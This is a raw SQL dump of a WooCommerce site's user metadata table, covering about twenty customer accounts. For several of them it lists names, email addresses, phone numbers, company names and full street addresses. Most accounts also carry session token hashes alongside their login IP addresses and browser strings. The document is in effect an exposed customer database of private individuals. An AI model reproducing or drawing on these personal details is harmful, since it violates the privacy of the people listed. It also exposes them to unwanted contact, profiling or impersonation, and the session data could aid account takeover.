INSERT INTO `wp_usermeta` VALUES (5821, 336, 'session_tokens', 'a:2:{s:64:"5346bd8cbf6e4e261e3bb3fbf6bb5b7f007883a55964f57ac41311b9db4fe8f0";a:4:{s:10:"expiration";i:1485381172;s:2:"ip";s:11:"69.198.64.2";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484171572;}s:64:"f6675b146efa32ef4e3fe9cc66a206cb41b28f964f5f6a45f9eca5219bb63fc8";a:4:{s:10:"expiration";i:1484349588;s:2:"ip";s:11:"69.198.64.2";s:2:"ua";s:76:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALCJS; rv:11.0) like Gecko";s:5:"login";i:1484176788;}}'); 
INSERT INTO `wp_usermeta` VALUES (5822, 337, 'nickname', 'chris'); 
INSERT INTO `wp_usermeta` VALUES (5823, 337, 'first_name', 'Chris'); 
INSERT INTO `wp_usermeta` VALUES (5824, 337, 'last_name', 'Copeland'); 
INSERT INTO `wp_usermeta` VALUES (5825, 337, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5826, 337, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5827, 337, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5828, 337, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5829, 337, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5830, 337, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5831, 337, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5832, 337, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5833, 337, '_yoast_wpseo_profile_updated', '1484236680'); 
INSERT INTO `wp_usermeta` VALUES (5834, 337, 'session_tokens', 'a:1:{s:64:"a84fe44d798dc222ece268dab4ba53a6cab800b8d43f50b94519fdb2a23e3a21";a:4:{s:10:"expiration";i:1485446281;s:2:"ip";s:12:"75.65.18.207";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1484236681;}}'); 
INSERT INTO `wp_usermeta` VALUES (5835, 337, 'billing_first_name', 'Oscar'); 
INSERT INTO `wp_usermeta` VALUES (5836, 337, 'billing_last_name', 'Atkinson'); 
INSERT INTO `wp_usermeta` VALUES (5837, 337, 'billing_company', 'Silicone Arts Labs, Inc'); 
INSERT INTO `wp_usermeta` VALUES (5838, 337, 'billing_email', 'chris@siliconeartslabs.com'); 
INSERT INTO `wp_usermeta` VALUES (5839, 337, 'billing_phone', '9016543499'); 
INSERT INTO `wp_usermeta` VALUES (5840, 337, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (5841, 337, 'billing_address_1', '806 S. Cooper St.'); 
INSERT INTO `wp_usermeta` VALUES (5842, 337, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (5843, 337, 'billing_city', 'memphis'); 
INSERT INTO `wp_usermeta` VALUES (5844, 337, 'billing_state', 'TN'); 
INSERT INTO `wp_usermeta` VALUES (5845, 337, 'billing_postcode', '38104'); 
INSERT INTO `wp_usermeta` VALUES (5846, 337, 'last_update', '1484236876'); 
INSERT INTO `wp_usermeta` VALUES (5847, 337, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5848, 338, 'nickname', 'john.zacher'); 
INSERT INTO `wp_usermeta` VALUES (5849, 338, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5850, 338, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5851, 338, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5852, 338, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5853, 338, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5854, 338, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5855, 338, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5856, 338, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5857, 338, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5858, 338, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5859, 338, '_yoast_wpseo_profile_updated', '1484255467'); 
INSERT INTO `wp_usermeta` VALUES (5860, 338, 'session_tokens', 'a:1:{s:64:"84a163e256b4f5e7e0a522260af4b64d8d60dded7fc6e43e0b553ad37e24b909";a:4:{s:10:"expiration";i:1485465068;s:2:"ip";s:14:"148.144.10.214";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484255468;}}'); 
INSERT INTO `wp_usermeta` VALUES (5861, 339, 'nickname', 'biermangj'); 
INSERT INTO `wp_usermeta` VALUES (5862, 339, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5863, 339, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5864, 339, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5865, 339, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5866, 339, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5867, 339, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5868, 339, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5869, 339, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5870, 339, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5871, 339, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5872, 339, '_yoast_wpseo_profile_updated', '1484256837'); 
INSERT INTO `wp_usermeta` VALUES (5873, 339, 'session_tokens', 'a:1:{s:64:"452d9a4bdad19d154c9e578a4783c0540e9c46b0c65b8c33d5428a30c9f08c34";a:4:{s:10:"expiration";i:1485466438;s:2:"ip";s:13:"205.213.172.3";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1484256838;}}'); 
INSERT INTO `wp_usermeta` VALUES (5874, 340, 'nickname', 'luiz.goldberg'); 
INSERT INTO `wp_usermeta` VALUES (5875, 340, 'first_name', 'Luiz'); 
INSERT INTO `wp_usermeta` VALUES (5876, 340, 'last_name', 'Goldberg'); 
INSERT INTO `wp_usermeta` VALUES (5877, 340, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5878, 340, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5879, 340, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5880, 340, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5881, 340, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5882, 340, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5883, 340, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5884, 340, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5885, 340, '_yoast_wpseo_profile_updated', '1484341396'); 
INSERT INTO `wp_usermeta` VALUES (5886, 340, 'session_tokens', 'a:1:{s:64:"5b5367e6412324cc0ca535e5e06fe1dca780ba54e48acb1cd47beb3461d081bb";a:4:{s:10:"expiration";i:1485550997;s:2:"ip";s:13:"184.91.75.159";s:2:"ua";s:132:"Mozilla/5.0 (iPad; CPU OS 10_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/22.0.141836113 Mobile/14C92 Safari/600.1.4";s:5:"login";i:1484341397;}}'); 
INSERT INTO `wp_usermeta` VALUES (5887, 340, 'billing_first_name', 'Luiz'); 
INSERT INTO `wp_usermeta` VALUES (5888, 340, 'billing_last_name', 'Goldberg'); 
INSERT INTO `wp_usermeta` VALUES (5889, 340, 'billing_company', 'General Avileasing Inc'); 
INSERT INTO `wp_usermeta` VALUES (5890, 340, 'billing_email', 'luiz.goldberg@gmail.com'); 
INSERT INTO `wp_usermeta` VALUES (5891, 340, 'billing_phone', '9546633412'); 
INSERT INTO `wp_usermeta` VALUES (5892, 340, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (5893, 340, 'billing_address_1', '9924 Cypress Vine Drive'); 
INSERT INTO `wp_usermeta` VALUES (5894, 340, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (5895, 340, 'billing_city', 'Orlando'); 
INSERT INTO `wp_usermeta` VALUES (5896, 340, 'billing_state', 'FL'); 
INSERT INTO `wp_usermeta` VALUES (5897, 340, 'billing_postcode', '32827'); 
INSERT INTO `wp_usermeta` VALUES (5898, 340, 'last_update', '1484341656'); 
INSERT INTO `wp_usermeta` VALUES (5899, 341, 'nickname', 'hawk4'); 
INSERT INTO `wp_usermeta` VALUES (5900, 341, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5901, 341, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5902, 341, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5903, 341, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5904, 341, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5905, 341, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5906, 341, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5907, 341, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5908, 341, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5909, 341, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5910, 341, '_yoast_wpseo_profile_updated', '1484562659'); 
INSERT INTO `wp_usermeta` VALUES (5911, 341, 'session_tokens', 'a:1:{s:64:"4006f15a1627a834ad118b9f597ed15c10ce3eabf00f586ad10e97dc198642d2";a:4:{s:10:"expiration";i:1485772260;s:2:"ip";s:12:"27.251.53.59";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1484562660;}}'); 
INSERT INTO `wp_usermeta` VALUES (5912, 342, 'nickname', 'michael.krupka'); 
INSERT INTO `wp_usermeta` VALUES (5913, 342, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5914, 342, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5915, 342, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5916, 342, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5917, 342, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5918, 342, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5919, 342, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5920, 342, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5921, 342, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5922, 342, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5923, 342, '_yoast_wpseo_profile_updated', '1484571995'); 
INSERT INTO `wp_usermeta` VALUES (5924, 342, 'session_tokens', 'a:1:{s:64:"95044b1e26d9aaa3921a74e0680f9ea35fccef7591f84a9feacdb14def0a242f";a:4:{s:10:"expiration";i:1485781596;s:2:"ip";s:12:"192.35.35.36";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484571996;}}'); 
INSERT INTO `wp_usermeta` VALUES (5925, 343, 'nickname', 'christopher.ibrom'); 
INSERT INTO `wp_usermeta` VALUES (5926, 343, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5927, 343, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5928, 343, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5929, 343, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5930, 343, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5931, 343, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5932, 343, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5933, 343, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5934, 343, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5935, 343, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5936, 343, '_yoast_wpseo_profile_updated', '1484576105'); 
INSERT INTO `wp_usermeta` VALUES (5937, 343, 'session_tokens', 'a:1:{s:64:"6358214cb04ecbc22204867a4a92af594b0c882b7044ffe01cc5606da2f96a20";a:4:{s:10:"expiration";i:1485785705;s:2:"ip";s:14:"165.225.34.124";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1484576105;}}'); 
INSERT INTO `wp_usermeta` VALUES (5938, 344, 'nickname', 'pa.s.cha'); 
INSERT INTO `wp_usermeta` VALUES (5939, 344, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5940, 344, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5941, 344, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5942, 344, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5943, 344, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5944, 344, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5945, 344, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5946, 344, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5947, 344, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5948, 344, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5949, 344, '_yoast_wpseo_profile_updated', '1484587699'); 
INSERT INTO `wp_usermeta` VALUES (5950, 344, 'session_tokens', 'a:1:{s:64:"38784d8c3db7faeda578008cd241c24bcc4c1597bf6021c36457d921973dcd76";a:4:{s:10:"expiration";i:1485797300;s:2:"ip";s:13:"130.221.224.7";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484587700;}}'); 
INSERT INTO `wp_usermeta` VALUES (5951, 344, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5952, 345, 'nickname', 'Eric_J_Hokanson'); 
INSERT INTO `wp_usermeta` VALUES (5953, 345, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5954, 345, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5955, 345, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5956, 345, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5957, 345, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5958, 345, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5959, 345, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5960, 345, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5961, 345, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5962, 345, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5963, 345, '_yoast_wpseo_profile_updated', '1484594553'); 
INSERT INTO `wp_usermeta` VALUES (5964, 345, 'session_tokens', 'a:2:{s:64:"f441f74718c9042de6bbbedb879b268b6d076cca65f98aa927501bd6ff2ad931";a:4:{s:10:"expiration";i:1485804154;s:2:"ip";s:15:"198.232.211.130";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484594554;}s:64:"45a9c925ec35092090cef91bd466b7ae7287d382f13b7b116077a17dc2a733c0";a:4:{s:10:"expiration";i:1484767477;s:2:"ip";s:15:"198.232.211.130";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484594677;}}'); 
INSERT INTO `wp_usermeta` VALUES (5965, 345, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5966, 346, 'nickname', 'ktamarroquin'); 
INSERT INTO `wp_usermeta` VALUES (5967, 346, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5968, 346, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5969, 346, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5970, 346, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5971, 346, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5972, 346, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5973, 346, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5974, 346, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5975, 346, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5976, 346, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5977, 346, '_yoast_wpseo_profile_updated', '1484596563'); 
INSERT INTO `wp_usermeta` VALUES (5978, 346, 'session_tokens', 'a:1:{s:64:"ccab7396c83b815deb76f98be5c76bb83ed01cabf3e4868d5bd04a9cefcecbe3";a:4:{s:10:"expiration";i:1485806164;s:2:"ip";s:13:"12.47.205.126";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.71 Safari/537.17";s:5:"login";i:1484596564;}}'); 
INSERT INTO `wp_usermeta` VALUES (5979, 347, 'nickname', 'navaids'); 
INSERT INTO `wp_usermeta` VALUES (5980, 347, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5981, 347, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5982, 347, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5983, 347, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5984, 347, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5985, 347, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5986, 347, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5987, 347, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5988, 347, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5989, 347, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5990, 347, '_yoast_wpseo_profile_updated', '1484604310'); 
INSERT INTO `wp_usermeta` VALUES (5992, 348, 'nickname', 'rwilcox'); 
INSERT INTO `wp_usermeta` VALUES (5993, 348, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5994, 348, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5995, 348, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5996, 348, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5997, 348, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5998, 348, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5999, 348, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6000, 348, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6001, 348, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6002, 348, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6003, 348, '_yoast_wpseo_profile_updated', '1484662073'); 
INSERT INTO `wp_usermeta` VALUES (6004, 348, 'session_tokens', 'a:1:{s:64:"c8a7676a480f9eb95fb6777fadc1a499faf33b342b2298eb9c7e27fefc68e64c";a:4:{s:10:"expiration";i:1496874699;s:2:"ip";s:12:"76.88.35.111";s:2:"ua";s:121:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1496701899;}}'); 
INSERT INTO `wp_usermeta` VALUES (6005, 349, 'nickname', 'htran'); 
INSERT INTO `wp_usermeta` VALUES (6006, 349, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6007, 349, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6008, 349, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6009, 349, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6010, 349, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6011, 349, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6012, 349, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6013, 349, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6014, 349, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6015, 349, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6016, 349, '_yoast_wpseo_profile_updated', '1484666249'); 
INSERT INTO `wp_usermeta` VALUES (6017, 349, 'session_tokens', 'a:1:{s:64:"8d6bbcb3b524f59465b1c1b21cfd23262f716005a381e4c4bdd5375679192ded";a:4:{s:10:"expiration";i:1485875850;s:2:"ip";s:14:"63.251.118.199";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1484666250;}}'); 
INSERT INTO `wp_usermeta` VALUES (6018, 350, 'nickname', 'jmccracken'); 
INSERT INTO `wp_usermeta` VALUES (6019, 350, 'first_name', 'john'); 
INSERT INTO `wp_usermeta` VALUES (6020, 350, 'last_name', 'mccracken'); 
INSERT INTO `wp_usermeta` VALUES (6021, 350, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6022, 350, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6023, 350, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6024, 350, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6025, 350, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6026, 350, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6027, 350, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6028, 350, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6029, 350, '_yoast_wpseo_profile_updated', '1484670782'); 
INSERT INTO `wp_usermeta` VALUES (6030, 350, 'session_tokens', 'a:1:{s:64:"216738c7c06a93e2daae97c2e85a05288f684117ffb97a41b5547fed856bdd2d";a:4:{s:10:"expiration";i:1485880383;s:2:"ip";s:15:"192.206.151.130";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0";s:5:"login";i:1484670783;}}'); 
INSERT INTO `wp_usermeta` VALUES (6031, 350, 'last_update', '1484670816'); 
INSERT INTO `wp_usermeta` VALUES (6032, 351, 'nickname', 'givesdsplz'); 
INSERT INTO `wp_usermeta` VALUES (6033, 351, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6034, 351, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6035, 351, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6036, 351, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6037, 351, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6038, 351, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6039, 351, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6040, 351, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6041, 351, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6042, 351, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6043, 351, '_yoast_wpseo_profile_updated', '1484674306'); 
INSERT INTO `wp_usermeta` VALUES (6044, 351, 'session_tokens', 'a:1:{s:64:"10968d12fe1db59b93106017c5ff61b10eb81393c6b50ab0b50e4da8e5c92405";a:4:{s:10:"expiration";i:1485883907;s:2:"ip";s:15:"131.137.245.206";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484674307;}}'); 
INSERT INTO `wp_usermeta` VALUES (6045, 352, 'nickname', 'antoinette.tabares'); 
INSERT INTO `wp_usermeta` VALUES (6046, 352, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6047, 352, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6048, 352, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6049, 352, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6050, 352, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6051, 352, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6052, 352, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6053, 352, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6054, 352, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6055, 352, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6056, 352, '_yoast_wpseo_profile_updated', '1484680531'); 
INSERT INTO `wp_usermeta` VALUES (6057, 352, 'session_tokens', 'a:1:{s:64:"667555be351648edc20c1f8fa2b8a57fc735e63ae10793f22869a3f34d7216b7";a:4:{s:10:"expiration";i:1485890132;s:2:"ip";s:14:"68.189.124.140";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1484680532;}}'); 
INSERT INTO `wp_usermeta` VALUES (6058, 353, 'nickname', 'jpritchett'); 
INSERT INTO `wp_usermeta` VALUES (6059, 353, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6060, 353, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6061, 353, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6062, 353, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6063, 353, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6064, 353, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6065, 353, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6066, 353, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6067, 353, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6068, 353, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6069, 353, '_yoast_wpseo_profile_updated', '1484682812'); 
INSERT INTO `wp_usermeta` VALUES (6070, 353, 'session_tokens', 'a:1:{s:64:"edb69eed63a75ab1d525eac6f184745bf7a4c57f956a2576dfa6f19114cbd641";a:4:{s:10:"expiration";i:1485892413;s:2:"ip";s:14:"50.192.168.122";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484682813;}}'); 
INSERT INTO `wp_usermeta` VALUES (6072, 354, 'nickname', 'steve.burnside'); 
INSERT INTO `wp_usermeta` VALUES (6073, 354, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6074, 354, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6075, 354, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6076, 354, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6077, 354, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6078, 354, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6079, 354, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6080, 354, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6081, 354, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
